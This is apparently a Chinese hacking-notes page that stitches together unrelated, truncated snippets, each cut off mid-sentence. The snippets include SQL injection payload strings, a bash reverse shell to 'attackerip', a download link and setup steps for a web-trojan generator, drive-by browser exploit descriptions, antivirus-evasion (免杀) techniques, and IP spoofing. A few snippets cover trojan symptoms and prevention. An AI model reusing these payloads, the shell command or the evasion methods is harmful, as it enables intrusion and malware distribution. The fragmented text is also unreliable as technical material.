瞎几把学

 在WINDOWS的SOCKET服务器应用的编程中，如下的语句或许比比都是：s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);saddr.sin_family = AF_INET;saddr.sin_addr.s_addr = htonl(INADDR_ANY);bind(s,(SOCKADDR *)&saddr,sizeof(saddr));其实这当中存在在非常

黑客技术，简单地说，是对计算机系统和网络的缺陷和漏洞的发现，以及针对这些缺陷实施攻击的技术。这里说的缺陷，包括软件缺陷、硬件缺陷、网络协议缺陷、管理缺陷和人为的失误。　　很显然，黑客技术对网络具有破坏能力。近段时间，一个很普通的黑客攻击手段把世界上一些顶级的大网站轮流考验了一遍，结果证明即使是如yahoo这样具有雄厚的技术支持的高性能商业网站，黑客都可以给他们带来经济损失。这在一定程度上损害了人们

注入经典语句总结 or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from adm

 4.利用MIME漏洞制做的网页木马。 它利用了Microsoft Internet Explorer中MIME/BASE64处理的漏洞，MIME(Multipurpose Internet Mail Extentions)，一般译作“多用途的网络邮件扩充协议”。顾名思义，它可以传送多媒体文件，在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形

 七、网页木马运行后特征分析 1.系统的默认主页被更改，并且IE工具栏内的修改功能被屏蔽掉；2.在系统的桌面上无故出现陌生网站的链接，无论怎么删除，每次开机都依旧会出现，如果单击鼠标右键，出现的工具栏中有也会有大量陌生网站的链接； 3.系统桌面及桌面上的图标被隐藏； 4.注册表编辑器被锁定，从而无法修改注册表； 5.上网之前，系统一切正常，下网之后系统就会出现异常情况，如系统盘

 MPEG-2网马生成器生成器, MPEGMPEG-2网马生成器下载地址：http://www.zhuahei.cn/download/MPEG20DAY.zip将生成的go.jpg文件和muma.html,logo.gif三个文件放同一网站目录下，如果网站是liunx或非WINDOWS系统请改go.jpg文件名为go.js，相对应的muma.html代码里的g

症状描述：最近编写一个BHO,在Windows2003主机上研发并测试成功，拷贝到其他主机也是Windows2003系统后，不能够正常运行，把代码拷贝过来进行调试，BHO也不能够被调试，因为根本就没有运行进来，苦闷！该机器前面是可以正常运行BHO的，到底怎么了？解决办法：打开IE的选项修改其安全内容，将允许第三方软件扩展打开就可以了。tnnd,搞了几天。

#include <winsock2.h>#include <windows.h>#include <stdio.h>#include <io.h>#include <fcntl.h>#include <memory.h>#include <wchar.h>#include "srvsvc.h"#include "srvsvc_c.c"#include "mem.h"#pragma comment(lib,"ws2_32")#pragma comment(lib,

解决办法:安装完teamview设置

/bin/bash  -i > /dev/tcp/attackerip/connect端口 0&1直接在服务

 IP欺骗技术就是通过伪造某台主机的IP地址骗取特权从而进行攻击的技术。许多应用程序认为如果数据包能够使其自身沿着路由到达目的地，那么源IP地址一定是有效的，而这正是使源IP地址欺骗攻击成为可能的前提。IP欺骗攻击　　IP欺骗技术就是通过伪造某台主机的IP地址骗取特权从而进行攻击的技术。许多应用程序认为如果数据包能够使其自身沿着路由到达目的地，而且应答包也可以回到源地，那么源IP地址一

 八、网页木马的预防 1. 避免浏览包含不健康内容的网页；2.  由于网页木马是含有害代码的ActiveX网页文件，因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止。具体方法是：在IE窗口中点击"工具→Internet选项，在弹出的对话框中选择"安全"标签，再点击"自定义级别"按钮，就会弹出"安全设置"对话框，把其中所有ActiveX插件和控件以及Java相关全部选择"禁

 六、常用网页木马运行原理的分析 1.javascript.Exception.Exploit常用的攻击代码：Function destroy(){ try { //ActiveX initialization 初始化ActiveX，为修改注册表做准备 a1=document.applets[0];  //获取applet运行对象，以下语句指向注册表中有关IE的表项a1.setCLSI

【分享】PE病毒学习笔记——初识感染技术    标 题: 【分享】PE病毒学习笔记——初识感染技术作 者: kmyc时 间: 2007-10-04,17:07链 接: http://bbs.pediy.com/showthread.php?t=52777本来打算10.1长假天天去自习的，结果学校居然在假期把所有的自习室

大家对木马都不陌生了，它可能要算是计算机病毒史上最厉害的了，相信会使木马的人千千万万，但是有很多人苦于怎么把木马发给对方，现在随着计算机的普及，在网络上我相信很少有人会再轻易的接收对方的文件了，所以网页木马诞生了。 1.它应该算是html带动同路径下的一个exe的文件的主页了，也就是当浏览器浏览这个页面的时候，一个exe的文件就在后台自动下载并执行了，可以做一个test.html的文件在桌面，内容

虚拟机加密免杀 最新免杀技术——虚拟机加密代码应用并非传统的修改特征码，也不是修改入口点+花指令，更不是加壳压缩！是最新的一种免杀技术！借于这种技术你可以千变万化，是免杀对新手来说更为简单！大家对虚拟机vmprotect是否有所了解，这个是最新的加密工具！可以加密PE文件中任何一句或一段代码自然可以给我们用来免杀了！ 免杀工具：vmprotect1.07或1.06（当然能搞到最新的个人版更好。）

 经常在一些BBS里和一些杂志里看到,渗透XX网站，其实就是拿了扔了一个WEBSHELL在上面，严格来说这根本算不上渗透。因为当你进了XX内网面对N多的机器的时候，才知道，内网是多么的庞大。下面我们先来看两张内网的拓扑结构图，图1，图2所示。如果有的朋友现在还不了解路由器和交换机等什么意思，那应该好好补习一下了。这里在说一下什么叫内网，可能有的朋友认192.168.1.x这样的形式就是内网，前段时

 二、网页木马的攻击原理 网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这

 三、可能被网页木马利用的漏洞 1．利用URL格式漏洞此类网页木马是利用URL格式漏洞来欺骗用户。构造一个看似JPG格式的文件诱惑用户下载，但事实上用户下载的却是一个EXE文件。此类攻击，具有相当的隐蔽性，利用URL欺骗的方法有很多种，比如起个具有诱惑性的网站名称或使用易混的字母数字掉包进行银行网络钓鱼，还有漏洞百出的“%30%50”之类的Unicode编码等等，现在列举比较常见的几种

 四、网页木马的基本用法 理解了网页木马攻击的原理，以及常用的漏洞，就可以写出相关的利用代码。制作出网页木马，然后就是传播网页木马，目前网页木马的主要传播途径是：1．通过IM及时聊天软件传播将包含网页木马的地址（网址）通过QQ等聊天软件在网络中分发，一旦有用户访问了该网页，该网页就会在系统中自动下载并运行放置在网络上的木马。2．攻击知名网站，获得Webshell权限后，在网站中填加

 五、目前常用的网页木马制作方式 1.javascript.Exception.Exploit利用JS+WSH的完美结合，来制作恶意网页。2.错误的MIME Multipurpose Internet Mail Extentions，多用途的网际邮件扩充协议头.几乎是现在网页木马流行利用的基本趋势，这个漏洞在IE5.0到IE6.0版本中都有。3.EXE to .BMP + Javasc

 1.基础的汇编语言2.修改工具(不指那些傻瓜式软件)。如：OllyDbg . PEditor. C32ASM . MYCCL复合特征码定位器。UE .OC. 资源编辑器等。还有一些查壳 脱壳软件(如：PEID RL脱壳机等) . 以下是常用的几种免杀方法及工具：一、要使一个木马免杀首先要准备一个不加壳的木马，这点非常重要，否则 免杀操作就不能进行下去。 然后我们要木马的内存免杀，

& 放在启动参数后面表示设置此进程为后台进程默认情况下，进程是前台进程，这时就把Shell给占据了，我们无法进行其他操作，对于那些没有交互的进程，很多时候，我们希望将其在后台启动，可以在启动参数的时候加一个’&’实现这个目的。